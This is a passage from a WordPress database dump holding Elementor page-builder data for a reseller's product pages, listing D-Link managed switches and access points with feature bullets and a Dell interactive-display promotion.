]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7494,3399,'_elementor_version','2.5.14'),(7495,3399,'_elementor_edit_mode','builder'),(8675,3667,'_elementor_data','[{\"id\":\"1428c7d\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"10c0343\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.072},\"elements\":[{\"id\":\"c13c1a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_02.jpg\\\" alt=\\\"Transform your meeting space\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf7a1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.928,\"content_position\":\"center\"},\"elements\":[{\"id\":\"c18c5e2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Transform your meeting space<\\/h2><\\/div><div>Dell, the world\\u2019s number one monitor brand<a class=\\\"technote microcontent\\\" rel=\\\"technotes:monitor-tracker\\\">*<\\/a>, has the tools and technology you need to facilitate teamwork. With our open standards approach and\\u00a0wide variety of displays ranging from 55\\u201d to 86\\u201d, it\\u2019s easy to find and\\u00a0customize a solution\\u00a0that keeps your team engaged and lets your business thrive.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a29589\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d94f107\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0d139f5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02b0460\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f2f2f2\"},\"elements\":[{\"id\":\"23442a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"4c2a77c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_title\\\">Maximize your team\\u2019s productivity<\\/h2><div class=\\\"top-offset-small bottom-offset-small text-dark-red\\\" style=\\\"text-align: center;\\\" data-testid=\\\"producthero_module_subtitle\\\">Make meetings more efficient with our collaboration-enhancing features and easy connectivity.<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2222c78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a87a431\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_03.jpg\\\" alt=\\\"Maximize your team\\u2019s productivity\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df1a833\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"229d78d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f465b01\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6dddbc3\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ad2406f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.64},\"elements\":[{\"id\":\"f0cdfa8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/i.dell.com\\/sites\\/csimages\\/Product_Imagery\\/all\\/LFD-franchisepage-responsive_04.jpg\\\" alt=\\\"Next-level teamwork\\\" width=\\\"347\\\" height=\\\"256\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8bd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.36,\"content_position\":\"bottom\"},\"elements\":[{\"id\":\"de42688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><h2>Next-level teamwork<\\/h2><\\/div><div><strong>More ways to interact:<\\/strong>\\u00a0Group collaboration is more seamless and intuitive than ever with our interactive monitors<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>. And, a simple touch of your hand or swipe of a stylus allows you to experience real-time interaction with virtually zero lag.<br \\/><br \\/><\\/div><div><p><strong>Collaboration solutions:<\\/strong>\\u00a0Annotate, collaborate and whiteboard with included software like DisplayNote and FlatFrog<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>.<br \\/><br \\/><strong>Collaboration for all:<\\/strong>\\u00a0Dell Screen Drop feature<a class=\\\"technote microcontent\\\" rel=\\\"technotes:available-monitors\\\">*<\\/a>\\u00a0lets you lower the displayed image so that it\\u2019s easy to reach, with touch sensors on either side of the display for three additional height settings to fit people working from varying heights.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5029420\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b8e6817\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"29544d8\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(7501,3400,'_elementor_version','2.5.14'),(7502,3400,'_elementor_edit_mode','builder'),(8673,3667,'_elementor_version','2.7.4'),(8674,3667,'_wp_page_template','template-fullwidth.php'),(7505,3401,'_wp_page_template','template-fullwidth.php'),(7506,3401,'_elementor_template_type','post'),(7507,3401,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" 